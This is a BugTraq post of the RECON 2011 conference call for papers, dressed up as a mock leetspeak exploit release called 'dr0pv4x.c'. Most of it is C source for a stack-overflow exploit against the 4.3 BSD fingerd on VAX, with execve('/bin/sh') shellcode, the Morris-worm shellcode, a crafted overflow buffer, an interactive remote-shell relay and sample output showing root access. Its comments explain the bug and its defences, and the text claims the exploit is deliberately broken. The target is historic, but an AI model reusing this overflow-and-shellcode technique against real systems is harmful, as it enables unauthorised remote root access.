BugTraq
RECON 2011 CFP Mar 07 2011 02:20PM
hfortier recon cx
/*
+ + + +
+ + +
+ +
\ /
+ _ - _+_ - ,__
_=. .:. /=\ _|===|_ ||::|
| | _|. | | | | | | __===_ -=- ||::|
|==| | | __ |.:.| /\| |:. | | | | .|| : |||::|
| |- |.:|_|. :__ |.: |--|==| | .| |_ | ' |. ||. |||:.|
__|. | |_|. | |.|...||---| |==| | | | |_--. || |||. |
| | | |. | | |::.||: .| |==| | . : |=|===| :|| . ||| .|
|:.| .| | | | |:.:|| . | |==| | |=|===| . |' | | |
| | | | |' : . | ; ; ' |
' : ` : ' . ' . . :
' . R E C O N 2 0 1 1 .
` . . '
. C F P

0000000 REC0N 2011 (http://recon.cx)
0000020 JULY 8-10
0000040 HYATT REGENCY (New venue)
0000060 M0NTREAL
0000100
0000120 + REC0N 2011
0000140 - Conference and training
0000160 - No censorship, no sales pitches
0000200 - Videos from 2010 are coming online
0000220
0000240 + Now accepting submissions
0000260 - Single track
0000300 - 60 & 30 minute time slots
0000320 - Lightning talks at the party
0000340
0000360 + Primary topics
0000400 - Reverse engineering and/or exploitation:
0000420 + Software
0000440 - Malware
0000460 - Protection/DRM
0000500 - Anti-reversing
0000520 - Static/runtime analysis
0000540 + Hardware
0000560 - Embedded devices, consoles, femtocell
0000600 - Cellphones
0000620 - RFID, SDR (software defined radio)
0000640 - Side channel attacks
0000660 - Physical security (cameras, access control)
0000700 + Protocol
0000720 - GSM / CDMA
0000740
0000760 + Also of interest to us
0001000 - Privacy
0001020 + Anti-censorship
0001040 + Anti-surveillance
0001060 + Anonymity
0001100 + Counter-forensics
0001120
0001140 + Anything else elite
0001160
0001200 + Please include
0001220 - Short summary
0001240 - Name or alias
0001260 - Contact information
0001300 - Bio
0001320
0001340 + Important dates
0001360 - Training/conference registration opens March 20, 2011
0001400 - First round of selections: April 10, 2011
0001420 - CFP closes May 15, 2011
0001440
0001460 + Send submissions to
0001500 - cfp2011 @ recon.cx
0001520
0001540 + Speaker / attendee privacy
0001560 - Recon does not require speakers to use their real names
0001600 - Recon does not provide attendee or speaker information to third parties
0001620 (except where necessary for registration/payment)

* w0rd, n0w ph0r th3 g00dz..
* [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC]
*
* dr0pv4x.c
* t0p-s3kR1t w4r3z k0m1n' @ ya
* str8 fr0m the k0d3l1n3
* -th3 phr3zh pr1nc3 0f b3llk0r3

* w8, b4 i ph0rg3t, 3t3rn4l sh0utz 2:

route/daemon9, sw_r, Phiber Optik, Mendax, The Last Stage of Delirium (sup guys), 8lgm,
klog[ADM], luvz2chat, netl1nk, l0r3nz0, dmk, root (at) vax.recon (dot) cx [email concealed] (lol), SN, Fravia, Mammon_,
m1x, madruquz, xmux, the current maintainer of the sexchart, so1o*, newsham, lcamtuf, Ilfak,
archive.org, m4tr1x, u4ea, Acid Phreak, ACiD BuRN, Bi-Curious George, hypatia, tdz, Lady Gaga,
Lindsay Lohan, gov-boi, jennicide, netw1z, Johnny Lee Miller, pluvius, rtm, das_modem, imm,
w1z4rd, l0renz, Subgraph & The Future Crew

* a1ght, s0 ch3k1t, jU$t f0ll0w th3z3 E-Z st3pz

* st3p 1: c0mp1l3

* st3p 2: cl0z3 uR 3y3z & r3c1t3 th3 ph0ll0w1ng s4kr3d m4ntr4

OLD WAREZ = NO WAREZ ;)

* st3p 3: ./dr0pv4x [target] offset

+ pr3st0 +

$ ./dropvax X.X.X.X -12345
[+] ATDT X.X.X.X
[+] CONNECT 9600
[+] Return address: 0xUWISH
[*] Compiled for little-endian arch.
[+] Sent payload...
[+] Shell!
4.3 BSD UNIX #3: Sat Feb 14 20:31:03 PST 2004
16:56 up 6:08, 1 user, load average: 0.09, 0.06, 0.03
User tty from login@ idle JCPU PCPU what
root co 10:49 1 -sh -if
whoami:
root
Warning: no access to tty; thus no job control in this shell...
# exit

k p8ce 0ut,
- dj j4zzy 3fn3t & th3 phr3zh pr1nc3 0f b3llk0r3

Responsible Disclosure:

++w3 h4v3 p3r$0n4lly br0k3n th1$ expl01t 1n a w4y th4t 1z m0r3-th4n-s1mpl3 t0
f1x (1 br0k3n l1n3) w1th th3 1nph0rm4t10n pr0v1d3d 1n th3 k0MM3ntz++

* [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC] *
(research purposes only!!!)
*/

#include <ctype.h>
#include <errno.h>
#include <limits.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#ifdef BIG_ENDIAN_ARCH

/* Byte-swap a 32-bit value so the words written into the payload buffer end up
 * in VAX (little-endian) byte order when this tool is built on a big-endian
 * host.  NOTE: `value` is expanded four times, so only pass side-effect-free
 * expressions -- every use in this file passes a constant or a plain variable. */
#define bswap(value) (((u32) (value)) << 24 | (((u32) (value)) & 0x0000FF00) << 8 | (((u32) (value)) & 0x00FF0000) >> 8 | ((u32) (value)) >> 24)

#else

/* Little-endian host: the words are already in the target's byte order. */
#define bswap(value) (value)

#endif

/* Legacy declaration: <errno.h> is already included above and, on C99-and-later
 * libcs, errno is a macro, so this line is redundant at best. */
extern int errno;

int try_finger(char *, int);
void fdsh(int);

/* Unusual but valid declarator order (same as "typedef uint32_t u32;").
 * u32 is the type bswap() casts to.  Note that <stdint.h> is never included
 * directly, so uint32_t here relies on a transitive include (e.g. via
 * <netinet/in.h>). */
uint32_t typedef u32;


#ifndef USE_ALTERNATE_SHELLCODE /* VAX-11 shellcode w/ explanation */

/* execve("/bin/sh", NULL, NULL) -
Take advantage of the 4.3 BSD UNIX VM.
It always puts the process entry point (_start) at address 0x00000000.
This gives us valid memory (a zero-byte string, since the first two bytes
of procedures like _start on VAX (those called with "callg" instr.) are
the saved register-mask, and in _start's case this is zero (does not matter).
Furthermore, this line in kern_exec.c checks if:

if (ap == NULL && uap->envp) {
uap->argp = NULL;
...
}

So we don't need a valid argv at address zero.
See the VAX Architecture Reference Manual (VARM) or the
VAX Architecture Handbook.

http://www.bitsavers.org/pdf/dec/vax/archSpec has a copy
of the internal version of the VARM,
which will help explain the stack frame and the instruction set.
*/

unsigned char shellcode[] =
"\021\017" /* brb shellcode+0x11 (PC-relative) */
"\272\001" /* popr $0x1 (this is a mask: pop one word into r0) */
"\335\000\335\000" /* pushl $0 ; pushl $0 */
"\335P" /* pushl %r0 (address of /bin/sh string) */
"\335\003" /* pushl $0x3 */
"\320^\\" /* movl %sp, %ap */
"\274;" /* chmk $0x3b (change mode to kernel, 0x3b = execve) */
"\026\357\353" /* jsb shellcode+0x4 (PC-relative) */
"\377\377\377"
"/bin/sh"; /* .asciz "/bin/sh" */

#else /* USE_ALTERNATE_SHELLCODE */ /* RTMorris Internet Worm (1988) */

/* If you think the shellcode is the problem, try this one. */

u32 shellcode[] =
{
bswap(0x732f8fdd),
bswap(0x8fdd0068),
bswap(0x6e69622f),
bswap(0xdd5a5ed0),
bswap(0xdd00dd00),
bswap(0xd003dd5a),
bswap(0x3bbc5c5e)
};

#endif


/* Send a C string over the socket named `sock` in the enclosing scope.
 * `str` is evaluated twice (strlen + send), so only pass side-effect-free
 * expressions -- every caller below passes a string literal.  The return
 * value of send(2) is discarded. */
#define Send(str) send(sock, (str), strlen(str), 0)

/* Interactive relay over an already-connected socket.
 *
 * Pushes a fixed command sequence down the connection (PATH setup, a banner
 * grep on /vmunix, `w`/`whoami`, then `exec csh -if`) and afterwards shuttles
 * bytes between stdin/stdout and `sock` until either side hits EOF or an error.
 * Returns nothing; the caller prints its own closing banner.
 *
 * Defender's note: the command sequence below is the observable footprint on
 * the remote side -- a shell whose parent is the finger daemon running
 * `strings /vmunix`, `w`, `whoami` and exec'ing `csh -if` is the artefact to
 * look for in process accounting or shell history.
 */
void fdsh(int sock)
{
    printf("[+] Sent payload...\n");

    /* Presumably a grace period for the remote shell to come up before the
     * first command is written; not otherwise synchronised.  sleep(3) needs
     * <unistd.h>, which is not included, so it is implicitly declared here. */
    sleep(1);
    Send("echo '[+] Shell!'; PATH=$PATH:/etc:/bin:/usr/bin:/usr/ucb:/usr/new:/usr/old\n");
    Send("export PATH\n");
    Send("strings /vmunix | fgrep UNIX\n");
    Send("w ; echo whoami: ; whoami; exec csh -if\n");

    for (;;) {
        fd_set fds;
        char buf[2048];
        int nb;

        FD_ZERO(&fds);
        FD_SET(0, &fds);
        /* No FD_SETSIZE check: fine for a freshly created socket, undefined
         * behaviour if sock >= FD_SETSIZE. */
        FD_SET(sock, &fds);
        if (select(sock + 1, &fds, NULL, NULL, NULL) < 0) {
            perror("select");
            return;
        }
        /* Local keyboard -> remote. */
        if (FD_ISSET(0, &fds)) {
            nb = read(0, buf, sizeof(buf));
            if (nb <= 0) {
                /* EOF (nb == 0) also lands here and perror() then reports
                 * whatever stale errno happens to be set. */
                perror("read(2)");
                return;
            }
            /* Return value unchecked: a short send drops bytes silently. */
            send(sock, buf, nb, 0);
        }
        /* Remote -> local terminal. */
        if (FD_ISSET(sock, &fds)) {
            nb = read(sock, buf, sizeof(buf));
            if (nb <= 0) {
                perror("read(2)");
                return;
            }
            /* write(2) return value is unchecked as well. */
            write(1, buf, nb);
        }
    }
}

/* This routine exploits a fixed 512 byte input buffer in a VAX running
* the BSD 4.3 fingerd binary. It sends 536 bytes (plus a newline) to
* overwrite six extra words in the stack frame, including the return
* PC, to point into the middle of the string sent over. The instructions
* in the string do the direct system call version of execve("/bin/sh"). */

/* From sp4f ^^^^^^^ (lolololol) */

/*
* Here's what the VAX-11 stack frame looks like (from 4.3 BSD's <vax/frame.h>):
*/
#if 0
struct frame {
int fr_handler;
u_int fr_psw:16, /* saved psw */
fr_mask:12, /* register save mask */
:1,
fr_s:1, /* call was a calls, not callg */
fr_spa:2; /* stack pointer alignment */
int fr_savap; /* saved arg pointer */
int fr_savfp; /* saved frame pointer */
int fr_savpc; /* saved program counter */
};
#endif

/* Connect to host:79 (finger), send the 536-byte overflow string described in
 * the comment above, then hand the socket to fdsh() for the interactive part.
 *
 * host   -- dotted-quad or hostname; resolved via gethostbyname(3) when
 *           inet_addr(3) does not accept it.
 * offset -- subtracted from the hard-coded base return address.
 * Returns 0 once the session ends, -1 on resolution/socket/connect failure.
 *
 * For the reader: the underlying bug is a fixed 512-byte stack buffer in
 * fingerd filled by an unbounded line read (historically gets(3); the fix was
 * a bounded fgets()).  The six 32-bit words written at indices 128..133 below,
 * i.e. byte offsets 512..535, therefore overlay the callee's saved frame
 * (cf. <vax/frame.h> above), including the saved PC.  Any bounded read, and on
 * modern systems stack protection / non-executable stacks, defeats this
 * layout-dependent technique.
 *
 * Resource note: the socket `s` is never close()d on any path -- on the
 * connect failure path it is leaked outright, on success it is only reclaimed
 * at process exit.
 */
int try_finger(char *host, int offset)
{
    int s, i;
    struct sockaddr_in sin = { 0 };
    u32 retaddr = 0x7fffe8a8 - offset;
    char buf[536];

    /* AF_INET is the address-family constant; PF_INET has the same value on
     * every platform this could be built on, so it works, but AF_INET is
     * what sockaddr_in expects. */
    sin.sin_family = PF_INET;
    sin.sin_port = htons(79);
    sin.sin_addr.s_addr = inet_addr(host);

    /* -1 here is INADDR_NONE; the signed/unsigned comparison works by the usual
     * arithmetic conversion, but the named constant would be clearer. */
    if (sin.sin_addr.s_addr == -1) {
        struct hostent *h;
        h = gethostbyname(host);
        if (h == NULL) {
            herror("gethostbyname(3)");
            return -1;
        }
        /* Legacy BSD bcopy(3); equivalent to memcpy() here. */
        bcopy(h->h_addr, &sin.sin_addr, sizeof(u32));
    }

    if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) {
        perror("socket(2)");
        return -1;
    }

    printf("[+] ATDT %s\n", inet_ntoa(sin.sin_addr));

    if (connect(s, (void *)&sin, sizeof(sin)) < 0) {
        perror("connect(2)");
        printf("[-] NO DIALTONE\n");
        return -1;   /* leaks s */
    }

    printf("[+] CONNECT 9600\n");

    /* Bytes 0..399: single-byte filler the comment identifies as a VAX NOP. */
    for (i = 0; i < 400; i++)
        buf[i] = '\001'; /* VAX-11 NOP */

    /* For the default char[] shellcode, sizeof(shellcode) includes the
     * trailing NUL of the string literal. */
    bcopy(shellcode, buf + 400, sizeof(shellcode));

    /* Signed/unsigned comparison (int vs size_t); harmless since i >= 0. */
    for (i = 400 + sizeof(shellcode); i < sizeof(buf); i++)
        buf[i] = '\0'; /* VAX-11 HALT, try not to land on one. */

    /* %x with a uint32_t works on common ABIs; PRIx32 from <inttypes.h> is the
     * portable specifier. */
    printf("[+] Return address: %#x\n", retaddr);

#ifdef BIG_ENDIAN_ARCH
    printf("[*] Compiled for big-endian arch.\n");
#else
    printf("[*] Compiled for little-endian arch.\n");
#endif

    /* Six 32-bit stores at byte offsets 512..535 through a u32 alias of a char
     * array.  The language does not guarantee `buf` is 4-byte aligned and this
     * is a strict-aliasing violation; memcpy() of each word would be the
     * portable form. */
    *((u32 *)buf + 128) = bswap(0x7fffeab0);
    *((u32 *)buf + 129) = bswap(0x7fffeb60);
    *((u32 *)buf + 130) = bswap(0x20000000);
    *((u32 *)buf + 131) = bswap(0x7fffeb64);
    *((u32 *)buf + 132) = bswap(retaddr);
    *((u32 *)buf + 133) = 0;

    /* Both send(2) return values are unchecked; a short send would go unnoticed. */
    send(s, buf, sizeof(buf), 0); /* sizeof (buf) == 536 */
    send(s, "\n", 1, 0);

    fdsh(s);
    printf("[-] NO CARRIER\n");
    return 0;
}

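/* Entry point: usage is `hostname [offset]`.
 *
 * c/v -- argc/argv.  v[1] is the target host; v[2], when present, is a decimal
 *        offset passed through to try_finger().
 * Exits 1 on a usage error or an unparsable/out-of-range offset, 0 otherwise.
 *
 * The original read v[1] and v[2] before checking argc, which indexes past the
 * end of argv when the program is run with no arguments (argv[argc] is NULL,
 * argv[argc + 1] does not exist); the argc check now comes first.  The offset
 * is parsed with strtol(3) so garbage is rejected rather than silently treated
 * as 0 by atoi(3).  Callers with extra trailing arguments are still accepted,
 * as before.
 */
int main(int c, char **v)
{
    if (c < 2) {
        fprintf(stderr, "usage: %s hostname [offset]\n", v[0]);
        exit(1);
    }

    int offset = 0;
    if (c > 2) {
        char *end;
        errno = 0;
        long val = strtol(v[2], &end, 10);
        /* Reject empty input, trailing junk, overflow, and anything that does
         * not fit the int try_finger() takes. */
        if (end == v[2] || *end != '\0' || errno == ERANGE ||
            val < INT_MIN || val > INT_MAX) {
            fprintf(stderr, "%s: bad offset '%s'\n", v[0], v[2]);
            exit(1);
        }
        offset = (int)val;
    }

    try_finger(v[1], offset);
    return 0;
}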



 
